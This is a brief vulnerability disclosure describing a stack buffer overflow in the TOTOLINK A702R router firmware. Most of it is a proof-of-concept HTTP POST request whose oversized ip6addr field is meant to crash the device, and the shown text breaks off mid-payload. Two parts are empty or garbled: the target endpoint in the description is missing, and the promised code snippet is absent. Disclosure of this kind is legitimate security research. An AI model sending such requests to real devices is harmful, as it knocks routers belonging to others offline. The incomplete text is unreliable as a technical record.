Critical Vulnerability Information Overview Vendor: TOTOLINK Product: A702R Version: V4.0.0-B20230721.1521 Type: Stack Overflow Vulnerability Description The TOTOLINK A702R router running firmware version V4.0.0-B20230721.1521 is affected by a severe buffer overflow vulnerability. This vulnerability can be triggered by sending a malicious HTTP POST request to . Attackers can exploit this vulnerability to perform a Denial of Service (DoS) attack. Vulnerability Details Critical code snippet: This code contains a buffer overflow issue. POC ```http POST /boafm/formFilter HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1873 Origin: http://192.168.0.1 Connection: keep-alive Referer: http://192.168.0.1/title.htm sessionCheck=b1n8d775db272b0582a7f734/cdb9b4e4add&filterIp=1&ip=1&ip6addr=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa